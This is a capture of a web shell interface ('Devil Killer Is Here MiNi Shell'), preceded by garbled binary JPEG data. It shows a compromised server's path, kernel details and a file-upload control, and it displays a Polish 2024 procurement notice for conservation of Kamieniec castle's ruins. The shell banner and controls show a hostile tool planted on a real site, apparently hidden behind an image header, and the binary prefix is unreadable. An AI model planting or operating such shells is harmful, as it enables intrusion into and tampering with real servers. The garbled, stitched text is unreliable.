JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240702/0039224801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace konserwatorskie ruin zamku Kamieniec - zamek średni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KORCZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440560</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 18A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Korczyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@korczyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.korczyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kołder Andrzej F.H.U.P. MUZEUM ZAMKOWE KAMIENIEC, MUZEUM KULTURY SZLACHECKIEJ</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">370010530</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Podzmacze b/n</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Korczyna</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">38-420</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">788837412</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamek.kamieniec@gmail.com</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">zamekkamieniec.iqu.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace konserwatorskie ruin zamku Kamieniec - zamek średni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-414ef8e7-3848-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00392248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00044031/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Prace konserwatorskie ruin zamku Kamieniec - zamek średni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-414ef8e7-3848-11ef-880f-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a <br/>Wykonawcami odbywa się przy użyciu:<br/> - Platformy e-Zamówienia: https://ezamówienia.gov.pl<br/>Adres strony internetowej prowadzonego postępowania:<br/>https://korczyna.bip.gov.pl zakładka zamówienia publiczne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu muszą być zgodne z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. Komunikacja w postępowaniu, z wyłączeniem składania ofert udziału w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34;Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą korzystać ze wsparcia technicznego dostępnego pod numerem telefonu (032) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce &#34;Zgłoś problem&#34;. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .rtf, .xps, .odt, .jpg ze szczególnym wskazaniem na .pdf . W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip, .7Z .<br/>Wykonawca przygotowuje ofertę przy pomocy interaktywnego &#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce &#34;Informacje podstawowe&#34;. UWAGA! Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany &#34;Formularz ofertowy&#34; należy zawsze otwierać w programie Adobe Acrobat Reader DC. Wykonawca składa ofertę za pośrednictwem zakładki &#34;Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku &#34;Złóż ofertę&#34; system prezentuje okno składania ofert umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop (&#34;przeciągnij&#34; i &#34;upuść&#34; służące do dodawania plików. Wykonawca dodaje wybrany z dysku i uprzednio podpisany &#34;Formularz oferty&#34; w pierwszym polu (&#34;Wypełniony formularz oferty&#34;. W kolejnym polu (&#34;Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę&#34;) Wykonawca dodaje<br/>pozostałe pliki stanowiące ofertę lub składane wraz z ofertą. Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio opisanym pliku wraz z zaznaczeniem w nazwie &#34;Dokument stanowiący tajemnicę przedsiębiorstwa&#34;. System sprawdza czy złożone pliki są<br/>podpisane i automatycznie je szyfruje, jednocześnie informując o tym Wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). EPP i EPO dostępne są dla zalogowanego Wykonawcy w zakładce &#34;Oferty/Wnioski&#34;. Oferta może być złożona tylko do upływu terminu składania ofert. Wykonawca może przed upływem terminu składania ofert wycofać ofertę. Wykonawca wycofuje ofertę w zakładce<br/>&#34;Oferty/Wnioski&#34; używając przycisku &#34;Wycofaj ofertę&#34;. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych w prowadzonym postępowaniu o udzielenie zamówienia, wykonania zlecenia, usługi oraz zawarcia i realizacji umowy cywilno-prawnej zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych (RODO) <br/>1. Administratorem przetwarzanych danych osobowych jest Gmina Korczyna reprezentowana przez Wójta. Kontakt - adres: 38-420 Korczyna, Korczyna 18a, tel. wojt@korczyna.pl<br/>2. Kontakt do Inspektora Ochrony Danych e-mail: iodkorczyna@gmail.com<br/>3. Podstawą prawną przetwarzania danych może być: <br/>a. art. 6 ust. 1 lit. b RODO tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy,<br/>b. art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze tj. udzielenia zamówienia zgodnie z obowiązującymi przepisami prawa, w tym ustawy z dnia 23 kwietnia 1964 r. kodeks cywilny (Dz. U. z 2020 r. poz.1740) oraz ustawy z dnia 11 września 2019 r. prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019)<br/>4. Dane osobowe mogą być przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia, zawarcia i realizacji umowy, wykonania robót budowlanych. Dane będą przetwarzane w związku z postępowaniem o udzielenie zamówienia publicznego pn. „Prace konserwatorskie ruin zamku Kamieniec – zamek średni” prowadzonym w trybie podstawowym (art. 275 pkt 1) ustawy Pzp. <br/>5. Podanie danych jest dobrowolne ale konieczne w celu przystąpienia do zamówienia, zawarcia umowy oraz jej realizacji. Nie podanie danych skutkuje brakiem możliwości podjęcia współpracy. <br/>6. Dane będą przechowywane przez okres współpracy, trwania zawartej umowy a po jej zakończeniu przez okres wymagany kategorią archiwalną. W przypadku danych zawartych jedynie na fakturach dane są przechowywane przez okres 5 lat (kat. B5), w przypadku umów cywilnoprawnych bez składki na ubezpieczenie społeczne przez okres 10 lat (kat.B10), natomiast w przypadku opłacania składki społecznej przez okres 50 lat (kat.B50). <br/>7. Administrator może przekazać dane innym odbiorcom jedynie na podstawie przepisów prawa. Odbiorcą danych może być np: operator pocztowy w przypadku prowadzenia korespondencji, bank realizujący usługi bankowe. Szczegóły dotyczące odbiorców można uzyskać w siedzibie Administratora. <br/>8. Administrator nie przekazuje Państwa danych do państwa trzeciego ani do organizacji międzynarodowych. <br/>9. W związku z przetwarzaniem danych osobowych przysługuje żądanie następujących uprawnień: <br/>1) prawo dostępu do danych osobowych; <br/>2) prawo do żądania sprostowania danych osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne; <br/>3) prawo do usunięcia danych osobowych - w przypadku gdy ustała podstawa do ich przetwarzania, dane osobowe przetwarzane są niezgodnie z prawem, dane osobowe muszą być usunięte w celu wywiązania się z obowiązku wynikającego z przepisów prawa; <br/>4) prawo do żądania ograniczenia przetwarzania danych osobowych - w przypadku, gdy: osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych, przetwarzanie danych jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian ich ograniczenia, Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony lub dochodzenia roszczeń.<br/>10. Jeżeli przetwarzanie Państwa danych osobowych narusza przepisy RODO istnieje prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą w Warszawie.<br/>11. W oparciu o Państwa dane osobowe Administrator nie będzie podejmował wobec zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EPP. 271.9.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na przeprowadzeniu prac konserwatorskich ruin zamku Kamieniec - zamek średni w ramach uzyskanej od Banku Gospodarstwa Krajowego Wstępnej Promesy dofinansowania inwestycji z Rządowego Programu Odbudowy Zabytków Nr Edycja 2RPOZ/2023/8404/PolskiLad <br/>Zamówienie obejmuje wykonanie: <br/>MUR OD STRONY PÓŁNOCNEJ ZAMKU ŚREDNIEGO:<br/>Konserwacja wątku kamiennego:<br/> - ręczna rozbiórka muru z kamienia na zaprawie cementowo-wapiennej;<br/> - izolacja pozioma z blachy ołowiowej z wykonaniem warstwy wyrównawczej z <br/> zaprawy cementowej; <br/> - izolacje przeciwwilgociowe poziome z folii PCW;<br/> - ponowne ułożenie warstwy korony muru;<br/> - uzupełnienie spoin murów z kamienia zaprawa na bazie spoiw mineralnych -70% powierzchni <br/>ŚCIANY ZAMKU ŚREDNIEGO KORCZYŃSKIEGO:<br/>Pierwsza kondygnacja na wysokości pach sklepiennych:<br/> - uzupełnienie kamiennego wątku muru ciosami kamiennymi;<br/> - mycie konstrukcji pełnościennych woda z detergentem pod ciśnieniem;<br/> - uzupełnienie spoin murów z kamienia zaprawą na bazie spoiw mineralnych -70% powierzchni; <br/>Środkowa kondygnacja:<br/> - dezynfekcja powierzchni kamieni środkami przeciw roślinności;<br/> - mycie konstrukcji pełnościennych woda z detergentami pod ciśnieniem;<br/> - wykucie zaprawy ze spoin z zaprawy wapiennej lub cementowo-wapiennej;<br/> - uzupełnienie spoin murów z kamienia zaprawa na bazie spoiw mineralnych -70% powierzchni;<br/>Górna kondygnacja z koroną muru:<br/> - mycie konstrukcji pełnościennych wodą z detergentem pod ciśnieniem konstrukcji pełnościennych; <br/> - dezynfekcja powierzchni kamieni środkami przeciw roślinności;<br/> - wykucie zaprawy ze spoin z zaprawy wapiennej lub cementowo-wapiennej - 40% powierzchni;<br/> - uzupełnienie spoin murów z kamienia zaprawą na bazie spoiw mineralnych -40% powierzchni;<br/>Ściana wschodnia – rekonstrukcja destruktu muru kamiennego filaru w przejściu zamku:<br/>- dezynfekcja powierzchni kamieni środkami przeciw roślinności;<br/>- mycie konstrukcji pełnościennych woda z detergentami pod ciśnieniem konstrukcji pełnościennych;<br/>- wykucie zaprawy ze spoin z zaprawy wapiennej lub cementowo-wapiennej;<br/>- uzupełnienie spoin murów z kamienia zaprawą na bazie spoiw mineralnych - 80% powierzchni;<br/>- uzupełnienie ciosów kamiennych- rekonstrukcja.<br/> <br/>1. Przed rozpoczęciem prac budowlanych oraz przez cały okres wykonywania prac budowlanych Wykonawca zobowiązany jest ustalić wszystkie czynności mające wpływ na funkcjonowanie budynku z zarządcą obiektu.<br/><br/>2. Wykonawca zabezpieczy i odgrodzi plac budowy w taki sposób by zapewnić bezpieczny pieszy ciąg komunikacyjny na teren budynku muzealnego oraz na zamek wysoki. Obiekt będzie dostępny dla turystów w trakcie prowadzenia prac.<br/><br/>3.1. Zakres i sposób realizacji przedmiotu zamówienia został szczegółowo opisany w załączonym do SWZ przedmiarze robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z udziału w postępowaniu,<br/>2) spełniają warunki udziału w postępowaniu określone w Specyfikacji Warunków Zamówienia tj.:<br/>1. Spełniają warunek dotyczący zdolności do występowania w obrocie gospodarczym;<br/> Określenie warunków: <br/> Zamawiający nie stawia wymagań w tym zakresie.<br/>2. Spełniają warunek dotyczący wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej;<br/> Określenie warunków:<br/> Zamawiający nie stawia wymagań w tym zakresie.<br/>3. Spełniają warunek dotyczący sytuacji ekonomicznej lub finansowej; <br/> Określenie warunków:<br/> Zamawiający wymaga aby Wykonawca posiadał ubezpieczenie od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/> przedmiotem zamówienia. Suma gwarantowana nie może być mniejsza niż <br/> 150 000,00 PLN<br/>4. Spełniają warunek dotyczący zdolności technicznej lub zawodowej;<br/> Określenie warunków:<br/> a) Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże <br/> wykonanie co najmniej dwóch robót remontowo – konserwatorskich o <br/> wartości nie mniejszej niż 200 000,00zł brutto na obiekcie wpisanym do <br/> rejestru zabytków obejmującym swoim zakresem prace związane z <br/> wykonaniem rekonstrukcji ubytków struktury murów ciosem kamiennym, <br/> uzupełnienie spoin murów z kamienia zaprawą na bazie spoiw mineralnych <br/> ruin średniowiecznych lub średniowiecznych murów gotyckiej warowni lub <br/> średniowiecznego zamku - w okresie ostatnich pięciu lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/> w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/> oraz z podmiotów, na rzecz których robota ta została wykonana oraz <br/> załączeniem dowodów określających czy robota budowlana została wykonana <br/> należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/> dokumenty sporządzone przez podmiot, na rzecz którego robota budowlana <br/> została wykonana, a jeżeli Wykonawca z przyczyn niezależnych od niego nie <br/> jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/> b) Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca <br/> wykaże, iż dysponuje osobami posiadającymi uprawnienia budowlane do <br/> wykonywania samodzielnych funkcji technicznych w budownictwie do <br/> kierowania robotami budowlanymi bez ograniczeń w specjalności <br/> konstrukcyjno-budowlanej.<br/> Wymogiem Zamawiającego jest dysponowanie przez Wykonawcę co <br/> najmniej jedną osobą o ww. uprawnieniach, która będzie pełnić funkcję <br/> kierownika budowy.<br/> Kierownik prac budowlanych musi przedstawić min. 1 referencję <br/> dokumentującą wykonanie zadań remontowo-konserwatorskich obiektu <br/> wpisanego do rejestru zabytków obejmującym swoim zakresem prace <br/> związane z wykonaniem rekonstrukcji ubytków struktury murów ciosem <br/> kamiennym, uzupełnienie spoin murów z kamienia zaprawą na bazie spoiw <br/> mineralnych ruin średniowiecznych, lub średniowiecznych murów gotyckiej <br/> warowni lub średniowiecznego zamku. Wartość wykonanych prac nie mniejsza <br/> niż 200 000,00zł 